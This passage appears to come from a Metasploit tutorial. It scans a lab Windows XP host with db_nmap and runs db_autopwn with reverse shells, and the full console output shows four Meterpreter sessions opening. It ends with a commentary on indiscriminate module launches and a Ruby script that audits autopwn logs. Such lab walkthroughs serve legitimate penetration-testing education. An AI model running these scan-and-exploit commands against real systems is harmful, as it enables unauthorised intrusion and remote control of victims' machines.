Then we check it and take a look at the open services with db_nmap, which runs the scan and stores the results in the database:

Code:
msf > db_nmap -A 192.168.25.147

Starting Nmap 5.35DC1 ( http://nmap.org ) at 2010-11-18 08:56 CST
Nmap scan report for victim-30fe648f (192.168.25.147)
Host is up (0.00074s latency).
Not shown: 997 filtered ports
PORT     STATE  SERVICE       VERSION
139/tcp  open   netbios-ssn
445/tcp  open   microsoft-ds  Microsoft Windows XP microsoft-ds
2869/tcp closed icslap
MAC Address: 08:00:27:C1:63:8C (Cadmus Computer Systems)
Device type: general purpose
Running: Microsoft Windows XP
OS details: Microsoft Windows XP SP3
Network Distance: 1 hop
Service Info: OS: Windows

Host script results:
|_nbstat: NetBIOS name: VICTIM-30FE648F, NetBIOS user: <unknown>, NetBIOS MAC: 08:00:27:c1:63:8c (Cadmus Computer Systems)
|_smbv2-enabled: Server doesn't support SMBv2 protocol
| smb-os-discovery:
|   OS: Windows XP (Windows 2000 LAN Manager)
|   Name: MSHOME\VICTIM-30FE648F
|_  System time: 2010-11-18 08:56:26 UTC-8

TRACEROUTE
HOP RTT      ADDRESS
1   0.74 ms  victim-30fe648f (192.168.25.147)

OS and Service detection performed. Please report any incorrect results at http://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 52.71 seconds
The scan results are now in the database. Before we go ahead and run db_autopwn, a quick look at what it recorded for the host and its services (three services, two of them open, and no vulnerability references yet):

Code:
msf > db_hosts -c address,mac,name,state,updated_at,svcs,vulns

Hosts
=====

address         mac                name             state  updated_at               svcs  vulns
-------         ---                ----             -----  ----------               ----  -----
192.168.25.147  08:00:27:C1:63:8C  victim-30fe648f  alive  2010-11-18 15:34:25 UTC  3     0

msf > db_services

Services
========

created_at               info                               name          port  proto  state   updated_at               Host            Workspace
----------               ----                               ----          ----  -----  -----   ----------               ----            ---------
2010-11-18 15:34:26 UTC                                     netbios-ssn   139   tcp    open    2010-11-18 15:34:26 UTC  192.168.25.147  default
2010-11-18 15:34:26 UTC  Microsoft Windows XP microsoft-ds  microsoft-ds  445   tcp    open    2010-11-18 15:34:26 UTC  192.168.25.147  default
2010-11-18 15:34:26 UTC                                     icslap        2869  tcp    closed  2010-11-18 15:34:26 UTC  192.168.25.147  default
The help text lists the matching options. We select modules by open port (-p), ask for reverse-connect payloads (-r) and launch them (-e):

Code:
msf > db_autopwn -h
[*] Usage: db_autopwn [options]
	-h          Display this help text
	-t          Show all matching exploit modules
	-x          Select modules based on vulnerability references
	-p          Select modules based on open ports
	-e          Launch exploits against all matched targets
	-r          Use a reverse connect shell
	-b          Use a bind shell on a random port (default)
	-q          Disable exploit module output
	-R  [rank]  Only run modules with a minimal rank
	-I  [range] Only exploit hosts inside this range
	-X  [range] Always exclude hosts inside this range
	-PI [range] Only exploit hosts with these ports open
	-PX [range] Always exclude hosts with these ports open
	-m  [regex] Only run modules whose name matches the regex
	-T  [secs]  Maximum runtime for any exploit in seconds

msf > db_autopwn -p -r -e
[*] (1/50 [0 sessions]): Launching exploit/freebsd/samba/trans2open against 192.168.25.147:139...
[*] (2/50 [0 sessions]): Launching exploit/linux/samba/chain_reply against 192.168.25.147:139...
[*] (3/50 [0 sessions]): Launching exploit/linux/samba/lsa_transnames_heap against 192.168.25.147:139...
[*] (4/50 [0 sessions]): Launching exploit/linux/samba/trans2open against 192.168.25.147:139...
[*] (5/50 [0 sessions]): Launching exploit/multi/samba/nttrans against 192.168.25.147:139...
[*] (6/50 [0 sessions]): Launching exploit/multi/samba/usermap_script against 192.168.25.147:139...
[*] (7/50 [0 sessions]): Launching exploit/netware/smb/lsass_cifs against 192.168.25.147:139...
[*] (8/50 [0 sessions]): Launching exploit/osx/samba/lsa_transnames_heap against 192.168.25.147:139...
[*] (9/50 [0 sessions]): Launching exploit/solaris/samba/trans2open against 192.168.25.147:139...
[*] (10/50 [0 sessions]): Launching exploit/windows/brightstor/ca_arcserve_342 against 192.168.25.147:139...
[*] (11/50 [0 sessions]): Launching exploit/windows/brightstor/etrust_itm_alert against 192.168.25.147:139...
[*] (12/50 [0 sessions]): Launching exploit/windows/smb/ms03_049_netapi against 192.168.25.147:139...
[*] (13/50 [0 sessions]): Launching exploit/windows/smb/ms04_011_lsass against 192.168.25.147:139...
[*] (14/50 [0 sessions]): Launching exploit/windows/smb/ms04_031_netdde against 192.168.25.147:139...
[*] (15/50 [0 sessions]): Launching exploit/windows/smb/ms05_039_pnp against 192.168.25.147:139...
[*] (16/50 [0 sessions]): Launching exploit/windows/smb/ms06_040_netapi against 192.168.25.147:139...
[*] (17/50 [0 sessions]): Launching exploit/windows/smb/ms06_066_nwapi against 192.168.25.147:139...
[*] (18/50 [0 sessions]): Launching exploit/windows/smb/ms06_066_nwwks against 192.168.25.147:139...
[*] (19/50 [0 sessions]): Launching exploit/windows/smb/ms06_070_wkssvc against 192.168.25.147:139...
[*] (20/50 [0 sessions]): Launching exploit/windows/smb/ms07_029_msdns_zonename against 192.168.25.147:139...
[*] (21/50 [0 sessions]): Launching exploit/windows/smb/ms08_067_netapi against 192.168.25.147:139...
[*] (22/50 [0 sessions]): Launching exploit/windows/smb/ms10_061_spoolss against 192.168.25.147:139...
[*] (23/50 [0 sessions]): Launching exploit/windows/smb/netidentity_xtierrpcpipe against 192.168.25.147:139...
[*] (24/50 [0 sessions]): Launching exploit/windows/smb/psexec against 192.168.25.147:139...
[*] (25/50 [0 sessions]): Launching exploit/windows/smb/timbuktu_plughntcommand_bof against 192.168.25.147:139...
[*] (26/50 [0 sessions]): Launching exploit/freebsd/samba/trans2open against 192.168.25.147:445...
[*] (27/50 [0 sessions]): Launching exploit/linux/samba/chain_reply against 192.168.25.147:445...
[*] (28/50 [0 sessions]): Launching exploit/linux/samba/lsa_transnames_heap against 192.168.25.147:445...
[*] (29/50 [0 sessions]): Launching exploit/linux/samba/trans2open against 192.168.25.147:445...
[*] (30/50 [0 sessions]): Launching exploit/multi/samba/nttrans against 192.168.25.147:445...
[*] (31/50 [0 sessions]): Launching exploit/multi/samba/usermap_script against 192.168.25.147:445...
[*] (32/50 [0 sessions]): Launching exploit/netware/smb/lsass_cifs against 192.168.25.147:445...
[*] (33/50 [0 sessions]): Launching exploit/osx/samba/lsa_transnames_heap against 192.168.25.147:445...
[*] (34/50 [0 sessions]): Launching exploit/solaris/samba/trans2open against 192.168.25.147:445...
[*] (35/50 [0 sessions]): Launching exploit/windows/brightstor/ca_arcserve_342 against 192.168.25.147:445...
[*] (36/50 [0 sessions]): Launching exploit/windows/brightstor/etrust_itm_alert against 192.168.25.147:445...
[*] (37/50 [0 sessions]): Launching exploit/windows/smb/ms03_049_netapi against 192.168.25.147:445...
[*] (38/50 [0 sessions]): Launching exploit/windows/smb/ms04_011_lsass against 192.168.25.147:445...
[*] (39/50 [0 sessions]): Launching exploit/windows/smb/ms04_031_netdde against 192.168.25.147:445...
[*] (40/50 [0 sessions]): Launching exploit/windows/smb/ms05_039_pnp against 192.168.25.147:445...
[*] (41/50 [0 sessions]): Launching exploit/windows/smb/ms06_040_netapi against 192.168.25.147:445...
[*] (42/50 [0 sessions]): Launching exploit/windows/smb/ms06_066_nwapi against 192.168.25.147:445...
[*] (43/50 [0 sessions]): Launching exploit/windows/smb/ms06_066_nwwks against 192.168.25.147:445...
[*] (44/50 [0 sessions]): Launching exploit/windows/smb/ms06_070_wkssvc against 192.168.25.147:445...
[*] (45/50 [0 sessions]): Launching exploit/windows/smb/ms07_029_msdns_zonename against 192.168.25.147:445...
[*] (46/50 [0 sessions]): Launching exploit/windows/smb/ms08_067_netapi against 192.168.25.147:445...
[*] (47/50 [0 sessions]): Launching exploit/windows/smb/ms10_061_spoolss against 192.168.25.147:445...
[*] (48/50 [0 sessions]): Launching exploit/windows/smb/netidentity_xtierrpcpipe against 192.168.25.147:445...
[*] (49/50 [0 sessions]): Launching exploit/windows/smb/psexec against 192.168.25.147:445...
[*] (50/50 [0 sessions]): Launching exploit/windows/smb/timbuktu_plughntcommand_bof against 192.168.25.147:445...
[*] (50/50 [0 sessions]): Waiting on 23 launched modules to finish execution...
[*] (50/50 [1 sessions]): Waiting on 13 launched modules to finish execution...
[*] Meterpreter session 1 opened (192.168.25.133:5503 -> 192.168.25.147:1034) at 2010-11-18 08:58:58 -0600
[*] (50/50 [1 sessions]): Waiting on 12 launched modules to finish execution...
[*] Meterpreter session 2 opened (192.168.25.133:23683 -> 192.168.25.147:1035) at 2010-11-18 08:59:02 -0600
[*] (50/50 [2 sessions]): Waiting on 11 launched modules to finish execution...
[*] (50/50 [2 sessions]): Waiting on 8 launched modules to finish execution...
[*] Meterpreter session 4 opened (192.168.25.133:14963 -> 192.168.25.147:1038) at 2010-11-18 09:00:05 -0600
[*] Meterpreter session 3 opened (192.168.25.133:8853 -> 192.168.25.147:1037) at 2010-11-18 09:00:05 -0600
[*] (50/50 [4 sessions]): Waiting on 6 launched modules to finish execution...
[*] (50/50 [4 sessions]): Waiting on 5 launched modules to finish execution...
[*] (50/50 [4 sessions]): Waiting on 4 launched modules to finish execution...
[*] (50/50 [4 sessions]): Waiting on 3 launched modules to finish execution...
[*] (50/50 [4 sessions]): Waiting on 1 launched modules to finish execution...
[*] (50/50 [4 sessions]): Waiting on 0 launched modules to finish execution...

Four Meterpreter sessions came back over reverse connections to 192.168.25.133. Two things are worth noticing in that output. db_autopwn does not say which of the 50 modules produced each session. And because -p matches on port alone, 12 of the 50 launches were Samba exploits for FreeBSD, Linux, OS X and Solaris fired at a box nmap had already identified as Windows XP SP3. On anything but a lab target that is pointless noise on the wire and a crash risk for the service; use -m with a name regex such as windows/smb to restrict the module set, and -R to require a minimum rank, rather than firing everything a port matches.
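The post-run check just described, as an added example that is not part of the original post or of Metasploit itself: a small Ruby script that parses db_autopwn console output in the format shown above, counts launches per platform (taken from the second component of the module path), lists the launches whose platform cannot apply to the OS nmap identified, and counts the sessions that opened. The log lines embedded in it are a constructed sample in the same format as the run above, and the host OS label ("windows") is passed in by the caller; both are assumptions of the example.

```ruby
# Added example: offline audit of a db_autopwn transcript.
# Not from the original post or from Metasploit; the sample log below is
# constructed in the format of the run shown on the page.

LAUNCH_RE  = /Launching (?<mod>exploit\/\S+) against (?<host>[\d.]+):(?<port>\d+)/
SESSION_RE = /(?<type>\w+) session (?<id>\d+) opened \((?<lhost>[\d.]+):(?<lport>\d+) -> (?<rhost>[\d.]+):(?<rport>\d+)\)/

# Constructed sample: a short run in the same format as the page's output.
SAMPLE_LOG = <<~LOG
  [*] (1/8 [0 sessions]): Launching exploit/freebsd/samba/trans2open against 192.168.25.147:139...
  [*] (2/8 [0 sessions]): Launching exploit/linux/samba/trans2open against 192.168.25.147:139...
  [*] (3/8 [0 sessions]): Launching exploit/multi/samba/usermap_script against 192.168.25.147:139...
  [*] (4/8 [0 sessions]): Launching exploit/windows/smb/ms08_067_netapi against 192.168.25.147:139...
  [*] (5/8 [0 sessions]): Launching exploit/solaris/samba/trans2open against 192.168.25.147:445...
  [*] (6/8 [0 sessions]): Launching exploit/windows/smb/ms08_067_netapi against 192.168.25.147:445...
  [*] (7/8 [0 sessions]): Launching exploit/windows/smb/psexec against 192.168.25.147:445...
  [*] (8/8 [0 sessions]): Launching exploit/osx/samba/lsa_transnames_heap against 192.168.25.147:445...
  [*] (8/8 [0 sessions]): Waiting on 8 launched modules to finish execution...
  [*] Meterpreter session 1 opened (192.168.25.133:5503 -> 192.168.25.147:1034) at 2010-11-18 08:58:58 -0600
  [*] Meterpreter session 2 opened (192.168.25.133:23683 -> 192.168.25.147:1035) at 2010-11-18 08:59:02 -0600
  [*] (8/8 [2 sessions]): Waiting on 0 launched modules to finish execution...
LOG

# The platform is the path component after "exploit/" (windows, linux, multi, ...).
def module_platform(mod)
  mod.split('/')[1]
end

# Split a transcript into the launch records and the session records it contains.
def parse_autopwn_log(text)
  launches = []
  sessions = []
  text.each_line do |line|
    if (m = LAUNCH_RE.match(line))
      launches << { module: m[:mod], platform: module_platform(m[:mod]),
                    host: m[:host], port: m[:port].to_i }
    elsif (m = SESSION_RE.match(line))
      sessions << { id: m[:id].to_i, type: m[:type],
                    rhost: m[:rhost], rport: m[:rport].to_i }
    end
  end
  { launches: launches, sessions: sessions }
end

# Launches whose platform cannot match the scanned OS. "multi" is kept,
# because the module path alone does not say which OS it targets.
def off_platform_launches(launches, host_os)
  launches.reject { |l| l[:platform] == 'multi' || l[:platform] == host_os }
end

# Summary a tester would want after the run: how much was fired, how much
# of it could never apply to this host, and how many sessions resulted.
def summarize(text, host_os)
  parsed = parse_autopwn_log(text)
  by_platform = parsed[:launches].group_by { |l| l[:platform] }.transform_values(&:size)
  {
    launched: parsed[:launches].size,
    by_platform: by_platform,
    off_platform: off_platform_launches(parsed[:launches], host_os).map { |l| "#{l[:module]}:#{l[:port]}" },
    sessions: parsed[:sessions].size,
  }
end

if __FILE__ == $PROGRAM_NAME
  s = summarize(SAMPLE_LOG, 'windows')
  puts "launched=#{s[:launched]} sessions=#{s[:sessions]}"
  puts "by platform: #{s[:by_platform]}"
  puts "off-platform launches against a Windows host:"
  s[:off_platform].each { |x| puts "  #{x}" }
end
```

To audit a real run, replace SAMPLE_LOG with File.read of the saved msfconsole output and pass the OS string nmap reported; the off-platform list is the set of module names a -m regex should have excluded before launch.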


